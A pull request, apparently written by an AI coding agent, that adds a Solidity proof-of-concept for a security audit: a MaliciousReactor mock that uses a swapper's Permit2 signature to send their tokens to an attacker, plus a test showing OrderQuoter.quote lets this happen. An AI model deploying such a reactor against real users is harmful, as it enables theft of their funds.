### PR TITLE
Add malicious reactor test for OrderQuoter

### DIFF
--- a/TestedVectors.md
+++ b/TestedVectors.md
@@ -247,3 +247,7 @@ We tested whether invoking `OrderQuoter.quote` with a fully signed order could t
 - **Vector:** Execute a `V3DutchOrder` where the `baseOutputs` array is empty.
 - **Test:** `V3DutchOrderReactorZeroOutputsTest.testExecuteNoOutputs` demonstrates that the filler keeps the input tokens since no outputs are specified.
 - **Result:** **Bug discovered** – orders without outputs execute successfully, allowing trivial theft of the swapper's tokens.
+## OrderQuoter with Malicious Reactor
+- **Description:** An order pointing to a reactor that does not revert allows `OrderQuoter.quote` to transfer tokens. The malicious reactor uses the permit to steal the swapper's tokens and returns successfully, so the Quoter does not revert.
+- **Test:** `OrderQuoterMaliciousReactorTest.testQuoteMaliciousReactorTransfersTokens` deploys such a reactor and shows the attacker receives the swapper's tokens after quoting.
+- **Result:** **Bug discovered** – quoting untrusted orders can lead to token theft.

--- a/test/lib/OrderQuoter.t.sol
+++ b/test/lib/OrderQuoter.t.sol
@@ -1,5 +1,6 @@
 // SPDX-License-Identifier: GPL-2.0-or-later
 pragma solidity ^0.8.0;
+error SignatureExpired(uint256 deadline);
 
 import {Test} from "forge-std/Test.sol";
 import {OrderInfo, InputToken, ResolvedOrder} from "../../src/base/ReactorStructs.sol";
@@ -26,7 +27,6 @@ contract OrderQuoterTest is Test, PermitSignature, ReactorEvents, DeployPermit2 
     uint256 constant ONE = 10 ** 18;
     address constant PROTOCOL_FEE_OWNER = address(1);
 
-    error SignatureExpired(uint256 deadline);
 
     OrderQuoter quoter;
     MockERC20 tokenIn;

--- a/test/lib/OrderQuoterMaliciousReactor.t.sol
+++ b/test/lib/OrderQuoterMaliciousReactor.t.sol
@@ -1,0 +1,56 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+pragma solidity ^0.8.0;
+
+import {Test} from "forge-std/Test.sol";
+import {DeployPermit2} from "../util/DeployPermit2.sol";
+import {PermitSignature} from "../util/PermitSignature.sol";
+import {OrderInfoBuilder} from "../util/OrderInfoBuilder.sol";
+import {OutputsBuilder} from "../util/OutputsBuilder.sol";
+import {MockERC20} from "../util/mock/MockERC20.sol";
+import {OrderQuoter} from "../../src/lens/OrderQuoter.sol";
+import {MaliciousReactor} from "../util/mock/MaliciousReactor.sol";
+import {LimitOrder} from "../../src/reactors/LimitOrderReactor.sol";
+import {OrderInfo, InputToken, SignedOrder} from "../../src/base/ReactorStructs.sol";
+import {IPermit2} from "permit2/src/interfaces/IPermit2.sol";
+
+contract OrderQuoterMaliciousReactorTest is Test, PermitSignature, DeployPermit2 {
+    using OrderInfoBuilder for OrderInfo;
+
+    uint256 constant ONE = 1e18;
+    address attacker = address(0xdead);
+
+    OrderQuoter quoter;
+    MockERC20 tokenIn;
+    MockERC20 tokenOut;
+    IPermit2 permit2;
+    MaliciousReactor malicious;
+    uint256 swapperPrivateKey;
+    address swapper;
+
+    function setUp() public {
+        quoter = new OrderQuoter();
+        permit2 = IPermit2(deployPermit2());
+        tokenIn = new MockERC20("In", "IN", 18);
+        tokenOut = new MockERC20("Out", "OUT", 18);
+        swapperPrivateKey = 0xabc123;
+        swapper = vm.addr(swapperPrivateKey);
+        tokenIn.mint(swapper, ONE);
+        malicious = new MaliciousReactor(permit2, attacker);
+    }
+
+    function testQuoteMaliciousReactorTransfersTokens() public {
+        tokenIn.forceApprove(swapper, address(permit2), ONE);
+        LimitOrder memory order = LimitOrder({
+            info: OrderInfoBuilder.init(address(malicious)).withSwapper(swapper),
+            input: InputToken(tokenIn, ONE, ONE),
+            outputs: OutputsBuilder.single(address(tokenOut), ONE, swapper)
+        });
+        bytes memory sig = signOrder(swapperPrivateKey, address(permit2), order);
+
+        vm.prank(swapper);
+        quoter.quote(abi.encode(order), sig);
+
+        assertEq(tokenIn.balanceOf(attacker), ONE);
+    }
+}
+

--- a/test/util/mock/MaliciousReactor.sol
+++ b/test/util/mock/MaliciousReactor.sol
@@ -1,0 +1,47 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+pragma solidity ^0.8.0;
+
+import {IReactor} from "../../../src/interfaces/IReactor.sol";
+import {IPermit2} from "permit2/src/interfaces/IPermit2.sol";
+import {LimitOrder, LimitOrderLib} from "../../../src/lib/LimitOrderLib.sol";
+import {Permit2Lib} from "../../../src/lib/Permit2Lib.sol";
+import {ResolvedOrder, SignedOrder} from "../../../src/base/ReactorStructs.sol";
+
+/// @notice Minimal reactor that steals tokens during executeWithCallback
+contract MaliciousReactor is IReactor {
+    using Permit2Lib for ResolvedOrder;
+
+    IPermit2 public immutable permit2;
+    address public immutable attacker;
+
+    constructor(IPermit2 _permit2, address _attacker) {
+        permit2 = _permit2;
+        attacker = _attacker;
+    }
+
+    // noop
+    function execute(SignedOrder calldata) external payable {}
+    function executeBatch(SignedOrder[] calldata) external payable {}
+    function executeBatchWithCallback(SignedOrder[] calldata, bytes calldata) external payable {}
+
+    function executeWithCallback(SignedOrder calldata order, bytes calldata) external payable {
+        LimitOrder memory lo = abi.decode(order.order, (LimitOrder));
+        ResolvedOrder memory r = ResolvedOrder({
+            info: lo.info,
+            input: lo.input,
+            outputs: lo.outputs,
+            sig: order.sig,
+            hash: LimitOrderLib.hash(lo)
+        });
+
+        permit2.permitWitnessTransferFrom(
+            r.toPermit(),
+            r.transferDetails(attacker),
+            r.info.swapper,
+            r.hash,
+            LimitOrderLib.PERMIT2_ORDER_TYPE,
+            r.sig
+        );
+        // return without reverting
+    }
+}


### PR DESCRIPTION
## Summary
- add MaliciousReactor mock and test showing OrderQuoter can transfer tokens if reactor does not revert
- expose `SignatureExpired` error at file scope for reuse
- document new attack vector in TestedVectors

## Testing
- `forge test --match-path test/lib/OrderQuoterMaliciousReactor.t.sol -vv`

------
https://chatgpt.com/codex/tasks/task_e_688d115ecd38832da4a6e97c29ac584e